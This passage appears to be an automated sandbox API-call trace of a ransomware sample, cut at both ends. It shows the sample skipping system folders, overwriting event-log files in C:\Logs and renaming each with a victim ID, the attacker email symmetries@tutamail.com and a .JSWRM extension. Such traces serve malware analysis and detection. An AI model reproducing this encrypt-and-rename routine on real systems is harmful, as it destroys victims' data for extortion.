ftLastAccessTime.dwLowDateTime=0xc9d33b19, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xa1dd3053, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft-Windows-NCSI%4Operational.evtx", cAlternateFileName="MI483C~1.EVT")) returned 1 [0065.903] lstrcmpiW (lpString1="Microsoft-Windows-NCSI%4Operational.evtx", lpString2=".") returned 1 [0065.903] lstrcmpiW (lpString1="Microsoft-Windows-NCSI%4Operational.evtx", lpString2="..") returned 1 [0065.903] lstrcmpiW (lpString1="Microsoft-Windows-NCSI%4Operational.evtx", lpString2="...") returned 1 [0065.903] lstrcmpiW (lpString1="Microsoft-Windows-NCSI%4Operational.evtx", lpString2="windows") returned -1 [0065.903] lstrcmpiW (lpString1="Microsoft-Windows-NCSI%4Operational.evtx", lpString2="recovery") returned -1 [0065.903] lstrcmpiW (lpString1="Microsoft-Windows-NCSI%4Operational.evtx", lpString2="perflogs") returned -1 [0065.904] lstrcmpiW (lpString1="Microsoft-Windows-NCSI%4Operational.evtx", lpString2="documents and settings") returned 1 [0065.904] lstrcmpiW (lpString1="Microsoft-Windows-NCSI%4Operational.evtx", lpString2="$RECYCLE.BIN") returned 1 [0065.904] lstrcmpiW (lpString1="Microsoft-Windows-NCSI%4Operational.evtx", lpString2="system volume information") returned -1 [0065.904] lstrcmpiW (lpString1="Microsoft-Windows-NCSI%4Operational.evtx", lpString2="msocache") returned -1 [0065.904] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232ef0 [0065.904] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft-Windows-NCSI%4Operational.evtx", cchWideChar=40, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 40 [0065.904] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8328 [0065.904] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft-Windows-NCSI%4Operational.evtx", cchWideChar=40, lpMultiByteStr=0x1f8328, cbMultiByte=40, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft-Windows-NCSI%4Operational.evtx", lpUsedDefaultChar=0x0) returned 40 [0065.904] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232ef0 | out: hHeap=0x1e0000) returned 1 [0065.904] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232c80 [0065.904] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft-Windows-NCSI%4Operational.evtx", cchWideChar=40, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 40 [0065.904] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f84e8 [0065.904] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft-Windows-NCSI%4Operational.evtx", cchWideChar=40, lpMultiByteStr=0x1f84e8, cbMultiByte=40, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft-Windows-NCSI%4Operational.evtx", lpUsedDefaultChar=0x0) returned 40 [0065.904] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232c80 | out: hHeap=0x1e0000) returned 1 [0065.904] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209440 [0065.904] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x233028 | out: hHeap=0x1e0000) returned 1 [0065.904] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0065.904] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345f69c, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0065.904] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209350 [0065.904] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-NCSI%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-ncsi%4operational.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x450 [0065.904] GetFileSizeEx (in: hFile=0x450, lpFileSize=0x345f630 | out: lpFileSize=0x345f630*=69632) returned 1 [0065.904] SetFilePointer (in: hFile=0x450, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0065.904] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x11000) returned 0x2481b0 [0065.904] ReadFile (in: hFile=0x450, lpBuffer=0x2481b0, nNumberOfBytesToRead=0x11000, lpNumberOfBytesRead=0x345f63c, lpOverlapped=0x0 | out: lpBuffer=0x2481b0*, lpNumberOfBytesRead=0x345f63c*=0x11000, lpOverlapped=0x0) returned 1 [0065.910] SetFilePointer (in: hFile=0x450, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0065.910] WriteFile (in: hFile=0x450, lpBuffer=0x2481b0*, nNumberOfBytesToWrite=0x11000, lpNumberOfBytesWritten=0x345f638, lpOverlapped=0x0 | out: lpBuffer=0x2481b0*, lpNumberOfBytesWritten=0x345f638*=0x11000, lpOverlapped=0x0) returned 1 [0065.910] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2481b0 | out: hHeap=0x1e0000) returned 1 [0065.910] CloseHandle (hObject=0x450) returned 1 [0065.912] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209170 [0065.912] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0065.912] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8638 [0065.912] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x1f8638, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0065.912] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8670 [0065.912] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8638 | out: hHeap=0x1e0000) returned 1 [0065.912] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0065.912] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a1e0 [0065.912] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a1e0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0065.912] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a1e0 | out: hHeap=0x1e0000) returned 1 [0065.912] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209698 [0065.912] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa6) returned 0x217b40 [0065.912] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209698 | out: hHeap=0x1e0000) returned 1 [0065.912] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xf8) returned 0x20e550 [0065.912] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x217b40 | out: hHeap=0x1e0000) returned 1 [0065.912] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8670 | out: hHeap=0x1e0000) returned 1 [0065.912] MoveFileW (lpExistingFileName="C:\\Logs\\Microsoft-Windows-NCSI%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-ncsi%4operational.evtx"), lpNewFileName="C:\\Logs\\Microsoft-Windows-NCSI%4Operational.evtx.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\logs\\microsoft-windows-ncsi%4operational.evtx.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0065.913] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20e550 | out: hHeap=0x1e0000) returned 1 [0065.913] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209170 | out: hHeap=0x1e0000) returned 1 [0065.913] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209350 | out: hHeap=0x1e0000) returned 1 [0065.913] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f84e8 | out: hHeap=0x1e0000) returned 1 [0065.913] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8328 | out: hHeap=0x1e0000) returned 1 [0065.913] FindNextFileW (in: hFindFile=0x231dc0, lpFindFileData=0x345f6c8 | out: lpFindFileData=0x345f6c8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcbcf0ff2, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xcbcf0ff2, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xa1dd3053, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft-Windows-NetworkProfile%4Operational.evtx", cAlternateFileName="MIFC66~1.EVT")) returned 1 [0065.913] lstrcmpiW (lpString1="Microsoft-Windows-NetworkProfile%4Operational.evtx", lpString2=".") returned 1 [0065.913] lstrcmpiW (lpString1="Microsoft-Windows-NetworkProfile%4Operational.evtx", lpString2="..") returned 1 [0065.913] lstrcmpiW (lpString1="Microsoft-Windows-NetworkProfile%4Operational.evtx", lpString2="...") returned 1 [0065.913] lstrcmpiW (lpString1="Microsoft-Windows-NetworkProfile%4Operational.evtx", lpString2="windows") returned -1 [0065.913] lstrcmpiW (lpString1="Microsoft-Windows-NetworkProfile%4Operational.evtx", lpString2="recovery") returned -1 [0065.913] lstrcmpiW (lpString1="Microsoft-Windows-NetworkProfile%4Operational.evtx", lpString2="perflogs") returned -1 [0065.913] lstrcmpiW (lpString1="Microsoft-Windows-NetworkProfile%4Operational.evtx", lpString2="documents and settings") returned 1 [0065.913] lstrcmpiW (lpString1="Microsoft-Windows-NetworkProfile%4Operational.evtx", lpString2="$RECYCLE.BIN") returned 1 [0065.913] lstrcmpiW (lpString1="Microsoft-Windows-NetworkProfile%4Operational.evtx", lpString2="system volume information") returned -1 [0065.913] lstrcmpiW (lpString1="Microsoft-Windows-NetworkProfile%4Operational.evtx", lpString2="msocache") returned -1 [0065.913] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x2094b8 [0065.913] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft-Windows-NetworkProfile%4Operational.evtx", cchWideChar=50, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 50 [0065.913] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20e268 [0065.913] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft-Windows-NetworkProfile%4Operational.evtx", cchWideChar=50, lpMultiByteStr=0x20e268, cbMultiByte=50, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft-Windows-NetworkProfile%4Operational.evtx", lpUsedDefaultChar=0x0) returned 50 [0065.913] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2094b8 | out: hHeap=0x1e0000) returned 1 [0065.914] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209170 [0065.914] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft-Windows-NetworkProfile%4Operational.evtx", cchWideChar=50, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 50 [0065.914] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20e418 [0065.914] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft-Windows-NetworkProfile%4Operational.evtx", cchWideChar=50, lpMultiByteStr=0x20e418, cbMultiByte=50, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft-Windows-NetworkProfile%4Operational.evtx", lpUsedDefaultChar=0x0) returned 50 [0065.914] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209170 | out: hHeap=0x1e0000) returned 1 [0065.914] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224dd8 [0065.914] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209440 | out: hHeap=0x1e0000) returned 1 [0065.914] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0065.914] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345f69c, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0065.914] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224aa8 [0065.914] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-NetworkProfile%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-networkprofile%4operational.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x450 [0065.914] GetFileSizeEx (in: hFile=0x450, lpFileSize=0x345f630 | out: lpFileSize=0x345f630*=69632) returned 1 [0065.914] SetFilePointer (in: hFile=0x450, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0065.914] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x11000) returned 0x2481b0 [0065.914] ReadFile (in: hFile=0x450, lpBuffer=0x2481b0, nNumberOfBytesToRead=0x11000, lpNumberOfBytesRead=0x345f63c, lpOverlapped=0x0 | out: lpBuffer=0x2481b0*, lpNumberOfBytesRead=0x345f63c*=0x11000, lpOverlapped=0x0) returned 1 [0065.919] SetFilePointer (in: hFile=0x450, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0065.920] WriteFile (in: hFile=0x450, lpBuffer=0x2481b0*, nNumberOfBytesToWrite=0x11000, lpNumberOfBytesWritten=0x345f638, lpOverlapped=0x0 | out: lpBuffer=0x2481b0*, lpNumberOfBytesWritten=0x345f638*=0x11000, lpOverlapped=0x0) returned 1 [0065.920] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2481b0 | out: hHeap=0x1e0000) returned 1 [0065.920] CloseHandle (hObject=0x450) returned 1 [0065.928] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x2257f0 [0065.928] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0065.928] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f87c0 [0065.928] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x1f87c0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0065.928] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8328 [0065.928] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f87c0 | out: hHeap=0x1e0000) returned 1 [0065.928] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0065.928] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a3d8 [0065.928] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a3d8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0065.928] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a3d8 | out: hHeap=0x1e0000) returned 1 [0065.928] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225548 [0065.929] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xbe) returned 0x1fc808 [0065.929] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225548 | out: hHeap=0x1e0000) returned 1 [0065.929] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x11c) returned 0x23f848 [0065.929] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0065.929] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8328 | out: hHeap=0x1e0000) returned 1 [0065.929] MoveFileW (lpExistingFileName="C:\\Logs\\Microsoft-Windows-NetworkProfile%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-networkprofile%4operational.evtx"), lpNewFileName="C:\\Logs\\Microsoft-Windows-NetworkProfile%4Operational.evtx.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\logs\\microsoft-windows-networkprofile%4operational.evtx.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0065.929] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23f848 | out: hHeap=0x1e0000) returned 1 [0065.929] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2257f0 | out: hHeap=0x1e0000) returned 1 [0065.929] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224aa8 | out: hHeap=0x1e0000) returned 1 [0065.929] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20e418 | out: hHeap=0x1e0000) returned 1 [0065.929] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20e268 | out: hHeap=0x1e0000) returned 1 [0065.929] FindNextFileW (in: hFindFile=0x231dc0, lpFindFileData=0x345f6c8 | out: lpFindFileData=0x345f6c8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x50ab3154, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0x50ab3154, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xd96d7ac9, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft-Windows-Ntfs%4Operational.evtx", cAlternateFileName="MI6E98~1.EVT")) returned 1 [0065.929] lstrcmpiW (lpString1="Microsoft-Windows-Ntfs%4Operational.evtx", lpString2=".") returned 1 [0065.930] lstrcmpiW (lpString1="Microsoft-Windows-Ntfs%4Operational.evtx", lpString2="..") returned 1 [0065.930] lstrcmpiW (lpString1="Microsoft-Windows-Ntfs%4Operational.evtx", lpString2="...") returned 1 [0065.930] lstrcmpiW (lpString1="Microsoft-Windows-Ntfs%4Operational.evtx", lpString2="windows") returned -1 [0065.930] lstrcmpiW (lpString1="Microsoft-Windows-Ntfs%4Operational.evtx", lpString2="recovery") returned -1 [0065.930] lstrcmpiW (lpString1="Microsoft-Windows-Ntfs%4Operational.evtx", lpString2="perflogs") returned -1 [0065.930] lstrcmpiW (lpString1="Microsoft-Windows-Ntfs%4Operational.evtx", lpString2="documents and settings") returned 1 [0065.930] lstrcmpiW (lpString1="Microsoft-Windows-Ntfs%4Operational.evtx", lpString2="$RECYCLE.BIN") returned 1 [0065.930] lstrcmpiW (lpString1="Microsoft-Windows-Ntfs%4Operational.evtx", lpString2="system volume information") returned -1 [0065.930] lstrcmpiW (lpString1="Microsoft-Windows-Ntfs%4Operational.evtx", lpString2="msocache") returned -1 [0065.930] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232c80 [0065.930] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft-Windows-Ntfs%4Operational.evtx", cchWideChar=40, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 40 [0065.930] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8638 [0065.930] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft-Windows-Ntfs%4Operational.evtx", cchWideChar=40, lpMultiByteStr=0x1f8638, cbMultiByte=40, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft-Windows-Ntfs%4Operational.evtx", lpUsedDefaultChar=0x0) returned 40 [0065.930] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232c80 | out: hHeap=0x1e0000) returned 1 [0065.930] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x233230 [0065.930] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft-Windows-Ntfs%4Operational.evtx", cchWideChar=40, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 40 [0065.930] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f84e8 [0065.930] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft-Windows-Ntfs%4Operational.evtx", cchWideChar=40, lpMultiByteStr=0x1f84e8, cbMultiByte=40, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft-Windows-Ntfs%4Operational.evtx", lpUsedDefaultChar=0x0) returned 40 [0065.930] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x233230 | out: hHeap=0x1e0000) returned 1 [0065.930] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209260 [0065.930] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224dd8 | out: hHeap=0x1e0000) returned 1 [0065.930] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0065.930] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345f69c, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0065.930] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x2092d8 [0065.930] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-Ntfs%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-ntfs%4operational.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x450 [0065.932] GetFileSizeEx (in: hFile=0x450, lpFileSize=0x345f630 | out: lpFileSize=0x345f630*=69632) returned 1 [0065.932] SetFilePointer (in: hFile=0x450, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0065.932] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x11000) returned 0x2481b0 [0065.932] ReadFile (in: hFile=0x450, lpBuffer=0x2481b0, nNumberOfBytesToRead=0x11000, lpNumberOfBytesRead=0x345f63c, lpOverlapped=0x0 | out: lpBuffer=0x2481b0*, lpNumberOfBytesRead=0x345f63c*=0x11000, lpOverlapped=0x0) returned 1 [0065.937] SetFilePointer (in: hFile=0x450, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0065.937] WriteFile (in: hFile=0x450, lpBuffer=0x2481b0*, nNumberOfBytesToWrite=0x11000, lpNumberOfBytesWritten=0x345f638, lpOverlapped=0x0 | out: lpBuffer=0x2481b0*, lpNumberOfBytesWritten=0x345f638*=0x11000, lpOverlapped=0x0) returned 1 [0065.937] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2481b0 | out: hHeap=0x1e0000) returned 1 [0065.937] CloseHandle (hObject=0x450) returned 1 [0065.939] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x2094b8 [0065.939] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0065.939] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8328 [0065.939] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x1f8328, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0065.939] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f87c0 [0065.939] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8328 | out: hHeap=0x1e0000) returned 1 [0065.939] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0065.939] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a468 [0065.939] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a468, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0065.939] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a468 | out: hHeap=0x1e0000) returned 1 [0065.939] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209530 [0065.940] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa6) returned 0x217250 [0065.940] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209530 | out: hHeap=0x1e0000) returned 1 [0065.940] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xf8) returned 0x20e550 [0065.940] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x217250 | out: hHeap=0x1e0000) returned 1 [0065.940] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f87c0 | out: hHeap=0x1e0000) returned 1 [0065.940] MoveFileW (lpExistingFileName="C:\\Logs\\Microsoft-Windows-Ntfs%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-ntfs%4operational.evtx"), lpNewFileName="C:\\Logs\\Microsoft-Windows-Ntfs%4Operational.evtx.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: 